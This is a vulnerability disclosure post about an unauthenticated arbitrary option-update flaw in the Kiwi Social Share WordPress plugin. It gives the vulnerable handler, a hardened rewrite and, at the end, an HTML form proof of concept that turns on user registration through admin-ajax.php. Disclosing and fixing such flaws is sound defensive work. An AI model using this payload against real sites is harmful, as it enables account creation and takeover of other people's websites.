Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are fully disclosing vulnerabilities in protest until WordPress gets that situation cleaned up; unfortunately so far that hasn’t happened. Instead they have continued apace doing downright strange stuff, like deleting people just saying thank you, and inappropriate stuff, like continuing to violate their own guidelines to promote certain security companies to clean up hacked websites (and lying in the process, since the companies they promote as “reputable” are anything but, as one of them lies all the time and the other doesn’t even attempt to properly clean up hacked websites). Now comes the time when their refusal to clean up their act is likely to have a huge consequence.
Last week an option update vulnerability in the plugin WP GDPR Compliance was widely exploited after it was fixed. After that happened we went to do some checks over the 1,000 most popular WordPress plugins related to that, while looking into improving our automated tool for detecting possible security issues in plugins, the Plugin Security Checker, and we found that the plugin Kiwi Social Share also has the same type of vulnerability.
In the case of this plugin the code is even easier to access than in the other plugin. In the file /includes/lib/helpers/class-kiwi-social-share-helper.php the function kiwi_social_share_set_option() is made available through WordPress AJAX functionality whether the request is coming from someone logged in to WordPress or not:
add_action( 'wp_ajax_kiwi_social_share_set_option', 'kiwi_social_share_set_option' );
add_action( 'wp_ajax_nopriv_kiwi_social_share_set_option', 'kiwi_social_share_set_option' );
While the code is a bit hard to make out, which might have allowed this to remain unnoticed from its introduction in May of last year until now, it will allow an arbitrary WordPress option to be updated to arbitrary values based on user input sent with a request, which hackers then can use to create new Administrator accounts, as well as other things:
function kiwi_social_share_set_option() {
    // No capability check and no nonce check: the only condition is that the
    // request's own 'action' field names this handler.
    if ( ! empty( $_POST ) && $_POST['action'] === 'kiwi_social_share_set_option' ) {
        // The option name, the key within it and the value all come straight
        // from the request, so any option can be read, modified and saved.
        $option = get_option( $_POST['args']['group'] );
        $option[ $_POST['args']['option'] ] = $_POST['args']['value'];
        update_option( $_POST['args']['group'], $option );
        wp_die( 'Success' );
    }
    wp_die( 'Forbidden' );
}
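For comparison, here is how the same handler looks once the three missing controls (authorization, CSRF protection and an allowlist of option names) are in place. This is an added example, not the plugin's code or a patch from its developer; it assumes the settings page sends a nonce in a field named nonce and that the plugin's own option groups are the hypothetical list KIWI_ALLOWED_OPTION_GROUPS.

```php
<?php
// Hardened rewrite of kiwi_social_share_set_option() (added example, not the plugin's code).
// Assumptions: the settings page generates wp_create_nonce( 'kiwi_social_share_set_option' )
// and posts it as 'nonce'; KIWI_ALLOWED_OPTION_GROUPS is a hypothetical list of the
// plugin's own option names.

// Registered for logged-in users only: there is no wp_ajax_nopriv_ hook at all.
add_action( 'wp_ajax_kiwi_social_share_set_option', 'kiwi_social_share_set_option_hardened' );

const KIWI_ALLOWED_OPTION_GROUPS = array( 'kiwi_social_share_general', 'kiwi_social_share_buttons' );

function kiwi_social_share_set_option_hardened() {
    // 1. Authorization: changing plugin settings is an administrator task.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'Forbidden', 403 );
    }

    // 2. CSRF: terminates the request unless a valid nonce is present in 'nonce'.
    check_ajax_referer( 'kiwi_social_share_set_option', 'nonce' );

    // 3. Input handling: unslash, then sanitize every field before use.
    $args  = ( isset( $_POST['args'] ) && is_array( $_POST['args'] ) ) ? wp_unslash( $_POST['args'] ) : array();
    $group = isset( $args['group'] )  ? sanitize_key( $args['group'] )          : '';
    $name  = isset( $args['option'] ) ? sanitize_key( $args['option'] )         : '';
    $value = isset( $args['value'] )  ? sanitize_text_field( $args['value'] )   : '';

    // 4. Allowlist: the option name must be one the plugin owns, so core options
    //    such as users_can_register or default_role are never reachable here.
    if ( ! in_array( $group, KIWI_ALLOWED_OPTION_GROUPS, true ) || '' === $name ) {
        wp_send_json_error( 'Invalid option', 400 );
    }

    $option = get_option( $group, array() );
    if ( ! is_array( $option ) ) {
        $option = array();
    }
    $option[ $name ] = $value;
    update_option( $group, $option );
    wp_send_json_success( 'Saved' );
}
```

Removing the wp_ajax_nopriv_ registration alone already closes the unauthenticated path; the capability and nonce checks are what stop a logged-in subscriber or a CSRF page from reaching the same code.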
Since the moderation of the Support Forum hasn’t been cleaned up, we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon) and they stop causing websites to be put at risk like this anymore. Though that may not happen, considering the moderators are abusing their power to promote certain security companies cleaning up hacked websites while getting in the way of those actually trying to fix security issues that could lead to websites being hacked.
If you were using our service and this plugin you would likely have been warned about this issue before you were reading this.
Our Plugin Security Checker was already able to catch the possibility of this type of vulnerability with code like that in a plugin that was widely exploited a couple of years ago. We have now added a check for the variant in this plugin and we will monitor what that flags in plugins to see if we can improve it. In addition we have added a more expansive check to our proactive monitoring of changes made to plugins in the Plugin Directory to try to catch serious vulnerabilities before they are exploited, which should also allow us to see if we can improve that new check.
Tomorrow we are going to be disclosing a less serious vulnerability in a security plugin that we noticed while looking over the 1,000 most popular plugins for something related to another serious vulnerability that had been in WP GDPR Compliance. That is unless the WordPress folks move to clean up their act between now and then (which we hope they do).
Proof of Concept
The following proof of concept will turn on user registration.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="kiwi_social_share_set_option" />
<input type="hidden" name="args[group]" value="users_can_register" />
<input type="hidden" name="args[value]" value="1" />
<input type="submit" value="Submit" />
</form>
</body>
</html>